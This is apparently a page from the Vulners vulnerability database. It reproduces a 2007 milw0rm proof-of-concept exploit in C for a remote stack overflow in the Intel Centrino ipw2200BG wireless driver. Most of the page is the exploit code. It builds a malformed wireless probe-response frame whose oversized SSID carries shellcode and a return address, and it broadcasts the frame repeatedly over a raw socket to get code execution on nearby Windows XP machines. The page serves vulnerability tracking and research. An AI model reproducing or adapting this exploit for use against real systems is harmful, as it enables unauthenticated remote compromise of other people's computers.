Vulners
Lucene search
Intel Centrino ipw2200BG - Wireless Driver Remote Overflow
/*
* This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
*
* Author:
* Giuseppe Gottardi (aka oveRet) <[email protected]>
* Senior Security Engineer at Communication Valley S.p.A.
*
* This version of code is only a Proof of Concept stack based exploit that demonstrates
* the remote code execution on ipw2200 driver. It execute a beep user space shellcode.
*
* It only works on XP SP2 ITA and it was only tested with 8.0.12.20000 version of
* IPW2200BG driver.
*
* Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
*
*/
#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
//#define DEBUG
#define DEV "wlan0"
#define DELAY 0.1
char wifi_packet[]=
"\x50"
"\x00"
"\x3a\x01"
"\x00\x0e\x35\x95\x7b\x45" //DSTMAC
"\x00\x01\x02\x03\x04\x05"
"\x00\x01\x02\x03\x04\x05"
"\xc0\x31"
"\x14\x3a\x25\x02\x00\x00\x00\x00"
"\xa0\x0f"
"\x31\x08"
"\x00\x9c" //SSID len
"\xeb\x38\xbb\x01\x03\xdf\xff\x4b\xfc\x8d\x7b\x7c\x5e\x6a\x17\x59"
"\xf3\xa5\xbf\x7c\x03\xfe\x7f\x39\x3b\x74\x09\x8b\x03\x8d\x4b\x08"
"\x89\x01\x89\x3b\x31\xc0\x64\xc6\x40\x24\x02\x8b\x1d\x1c\xf0\xdf"
"\xff\xb8\xc7\xc0\x4d\x80\x6a\x00\xff\xe0\xe8\xc3\xff\xff\xff\x60"
"\x6a\x30\x58\x99\x64\x8b\x18\x39\x53\x0c\x74\x26\x8b\x5b\x10\x8b"
"\x5b\x3c\x83\xc3\x28\x8b\x0b\x03\x4b\x03\x81\xf9\x6c\x61\x73\x73"
"\x75\x10\x64\x8b\x18\x43\x43\x43\x80\x3b\x01\x74\x05\xc6\x03\x01"
"\xeb\x07\x61\xff\x25\x08\x03\xfe\x7f\x55\x89\xe5\x83\xec\x18\xc7"
"\x45\xfc\x53\x8a\x83\x7c\xc7\x44\x24\x04\xd0\x03\x00\x00\xc7\x04"
"\x24\x01\x0e\x00\x00\x8b\x45\xfc\xff\xd0\xc9\xc3"
"\x01\x04\x82\x84\x8b\x96"
"\x03\x01\x05"
"\x85\x1e\x00\x00\x86\x00\x1f\x00\xff\x03\x19\x00\x61\x70\x00\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x06"
"\xdd\x18\x00\x50\xf2\x01\x01\x00\x00\x50\xf2\x02\x01\x00\x00\x50"
"\xf2\x02\x01\x00\x00\x50\xf2\x02\x28\x00"
"\xdd\x06\x00\x40\x96\x01\x01\x00"
"\xdd\x05\x00\x40\x96\x03\x04"
"\xdd\x16\x00\x40\x96\x04\x00\x09\x07\xa5\x00\x00\x23\xa5\x00\x00"
"\x42\x54\x00\x00\x62\x43\x00\x00"
"\xdd\x05\x00\x40\x96\x0b\x01"
"\xdd\x18\x00\x50\xf2\x02\x01\x01\x89\x00\x03\xa5\x00\x00\x27\xa5"
"\x00\x00\x42\x54\xbc\x00\x62\x43\x66\x00"
"\xdd\x10\x00\x50\xf2\x05\x00\x01\x00\x04\x00\x00\x83\x07"
"\x5a\xf0\x54\x80"; //RET address
int send_probe_response(char *dev)
{
struct sockaddr sa;
int sockfd;
int rc;
#ifdef DEBUG
int i;
u_char *moe = wifi_packet;
#endif /* DEBUG */
memset(&sa, 0, sizeof(struct sockaddr));
sa.sa_family = PF_PACKET;
memcpy(sa.sa_data, dev, sizeof(sa.sa_data));
#ifdef DEBUG
for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
if (!(i%32)) printf("\n");
printf("%02x ", *moe);
}
printf("\n");
#endif /* DEBUG */
if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
perror("socket");
return -1;
}
if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
close(sockfd);
perror("sendto");
return -1;
}
close(sockfd);
return rc;
}
int main(int argc, char *argv[])
{
int rc;
printf("waiting for beep shellcode execution...\n");
for (;;) {
rc = send_probe_response(DEV);
sleep(DELAY);
}
return 0;
}
// milw0rm.com [2007-01-19]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4